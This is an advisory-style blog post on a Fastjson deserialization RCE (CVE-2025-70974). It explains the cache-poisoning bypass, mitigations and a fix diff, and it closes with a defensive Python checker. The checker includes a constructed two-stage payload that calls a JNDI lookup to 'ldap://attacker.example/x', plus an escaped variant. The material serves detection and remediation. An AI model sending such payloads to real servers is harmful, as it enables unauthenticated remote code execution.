
CVE Reports

Posted on • Originally published at cvereports.com

CVE-2025-70974: Fastjson RCE: The 'Safe' Cache That Killed Your Server


Vulnerability ID: CVE-2025-70974
CVSS Score: 10.0
Published: 2026-01-09

A critical deserialization vulnerability in Alibaba Fastjson < 1.2.48 lets an attacker bypass the library's autoType protection by poisoning its internal name-to-class cache. When a JNDI-capable gadget class is present on the target's classpath, this leads to unauthenticated remote code execution (RCE) via JNDI injection.

TL;DR

Attackers can bypass Fastjson's autoType protection with a two-stage JSON payload. The first stage deserializes a value typed as java.lang.Class whose "val" names a denylisted gadget class that already exists on the target's classpath (the class must be loadable by the application; no attacker code is uploaded). Resolving that name stores the class in the parser's internal cache. The second stage references the same class via "@type". In the default configuration, where autoTypeSupport is off, the parser consults the cache before the denylist, so the cached class is returned and instantiated without the check ever running. With a gadget whose attacker-controlled field triggers a JNDI lookup, this becomes JNDI injection and full system takeover.


⚠️ Exploit Status: ACTIVE

Technical Details

  • Attack Vector: Network (JSON Payload)
  • CVSS: 10.0 (Critical)
  • Exploit Status: Weaponized / Active
  • Weakness: CWE-502 / CWE-829
  • Prerequisites: None (Unauthenticated)
  • Impact: Remote Code Execution (System Takeover)

Affected Systems

  • Java Applications using Fastjson
  • Spring Boot applications with Fastjson configured
  • Legacy Enterprise Java Middleware
  • fastjson: < 1.2.48 (Fixed in: 1.2.48)

Code Analysis

Commit: 153c306

Fastjson 1.2.48 security fix reducing cache reliance

@@ -1039,7 +1039,7 @@ public class TypeUtils {
-        return loadClass(className, null);
+        return loadClass(className, null, false);
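Review bot: the new third argument in "return loadClass(className, null, false);" is an unexplained bare boolean, and the three-argument overload it now calls is not shown in the hunk, so a reader of the diff cannot tell what "false" switches off. The commit description says the fix reduces cache reliance, so this is presumably a cache flag; name it at the call site (a comment or a constant rather than a bare false) or include the overload in the diff, and confirm that every other loadClass(className, null) caller got the same treatment, since this hunk covers only one call site.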

Exploit Details

  • Vulhub: Dockerized environment for reproducing the cache poisoning attack
  • GitHub: various JNDI injection servers (RMI/LDAP) that are commonly paired with Fastjson payloads

Mitigation Strategies

  • Upgrade the Fastjson library immediately (1.2.48 fixes this cache bypass; later 1.2.x releases fix further autoType bypasses)
  • Enable safeMode to disable autoType entirely; safeMode only exists from 1.2.68 onward, so it is a hardening step after the upgrade, not a substitute for it
  • Migrate to alternative JSON libraries (Jackson/Gson)

Remediation Steps:

  1. Identify all dependencies using fastjson < 1.2.48.
  2. Update maven/gradle dependency to version 1.2.83 or 2.x.
  3. If an update is not possible, add a WAF rule for JSON bodies containing '@type' and 'java.lang.Class'. Match on the decoded body: Fastjson accepts Unicode escapes, so a key written as "\u0040type" is parsed as "@type" and a literal-text rule alone is bypassed. Expect false positives if legitimate clients send "@type".
  4. Enable safeMode in code: ParserConfig.getGlobalInstance().setSafeMode(true); (available from 1.2.68; it rejects every "@type" key, so any legitimate polymorphic deserialization must be replaced first).
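The following Python is an added example, not code from the original post or from Fastjson. It backs two of the points above: step 1 (finding fastjson < 1.2.48 in `mvn dependency:tree` output) and step 3 together with the TL;DR mechanism (recognising the two-stage payload shape, a java.lang.Class/"val" object followed by an "@type" naming the same class, after decoding Unicode escapes so that "\u0040type" is not missed). The dependency-tree lines, the JSON bodies, the placeholder class name com.example.DeniedGadget and the URL attacker.example are constructed for illustration.

```python
"""Two checks for the remediation steps above (added example, not code from
the original post or from Fastjson itself).

* find_vulnerable_fastjson(): scans `mvn dependency:tree` text for
  com.alibaba:fastjson below 1.2.48 (the post's stated fix version).
* analyze_payload(): inspects a JSON request body for autoType use and for the
  two-stage cache trick, decoding \\u escapes first so "\\u0040type" is caught.

All inputs below are constructed; com.example.DeniedGadget is a placeholder.
"""
import json
import re
from typing import Any

FIXED_VERSION = (1, 2, 48)
FASTJSON_DEP = re.compile(r"com\.alibaba:fastjson:jar:([^:\s]+)")
UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")


def parse_version(version: str) -> tuple[int, ...]:
    """'1.2.47' -> (1, 2, 47). Non-numeric tail parts such as 'sec06' are dropped."""
    parts: list[int] = []
    for piece in version.split("."):
        if not piece.isdigit():
            break
        parts.append(int(piece))
    return tuple(parts)


def is_vulnerable_version(version: str) -> bool:
    """True for any com.alibaba:fastjson release older than the 1.2.48 fix."""
    return parse_version(version) < FIXED_VERSION


def find_vulnerable_fastjson(dependency_tree: str) -> list[str]:
    """Return the vulnerable fastjson versions mentioned in dependency-tree output."""
    return [m.group(1) for m in FASTJSON_DEP.finditer(dependency_tree)
            if is_vulnerable_version(m.group(1))]


def decode_unicode_escapes(text: str) -> str:
    """Turn \\u0040 into '@' etc., mirroring what a JSON parser does before key lookup."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def analyze_payload(body: str) -> dict[str, Any]:
    """Classify one JSON body.

    cached: class names pushed into the parser cache via {"@type":"java.lang.Class","val":...}
    autotype: every other "@type" value seen (direct autoType use)
    cache_poisoning: an "@type" repeats a name that an earlier java.lang.Class/val cached
    """
    result: dict[str, Any] = {"parsed": True, "cached": [], "autotype": [],
                              "cache_poisoning": False}
    try:
        # json.loads decodes "\u0040type" to "@type", as Fastjson does, so the
        # key check below is not fooled by escaped keys.
        doc = json.loads(body)
    except ValueError:
        # Not strict JSON (Fastjson is more lenient than json.loads): fall back to
        # a text match on the escape-decoded body so the request is still flagged.
        result["parsed"] = False
        result["autotype_text_hit"] = "@type" in decode_unicode_escapes(body)
        return result

    def walk(node: Any) -> None:
        if isinstance(node, dict):
            type_name = node.get("@type")
            if isinstance(type_name, str):
                if type_name == "java.lang.Class" and isinstance(node.get("val"), str):
                    result["cached"].append(node["val"])          # stage 1
                else:
                    if type_name in result["cached"]:               # stage 2
                        result["cache_poisoning"] = True
                    result["autotype"].append(type_name)
            for value in node.values():                             # document order
                walk(value)
        elif isinstance(node, list):
            for value in node:
                walk(value)

    walk(doc)
    return result


# Constructed samples (not captured traffic).
DEPENDENCY_TREE = """[INFO] +- com.alibaba:fastjson:jar:1.2.47:compile
[INFO] +- com.fasterxml.jackson.core:jackson-databind:jar:2.15.2:compile
[INFO] \\- com.alibaba:fastjson:jar:1.2.83:compile"""

TWO_STAGE = ('{"a":{"@type":"java.lang.Class","val":"com.example.DeniedGadget"},'
             '"b":{"@type":"com.example.DeniedGadget","url":"ldap://attacker.example/x"}}')

# Same payload with the key escaped: a literal '@type' string rule never sees it.
TWO_STAGE_ESCAPED = TWO_STAGE.replace('"@type"', '"\\u0040type"')

if __name__ == "__main__":
    print("vulnerable fastjson versions:", find_vulnerable_fastjson(DEPENDENCY_TREE))
    for name, body in [("plain", TWO_STAGE), ("escaped", TWO_STAGE_ESCAPED)]:
        print(name, analyze_payload(body))
```

Run it directly to see the version hits and both payload classifications; the escaped variant is flagged exactly like the plain one even though the raw text never contains "@type", which is the case a literal WAF rule misses. Fastjson tolerates input that json.loads rejects (single quotes, comments), so the fallback path only does a decoded text match and reports the body as unparsed rather than silently passing it.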

References


Read the full report for CVE-2025-70974 on our website for more details including interactive diagrams and full exploit analysis.
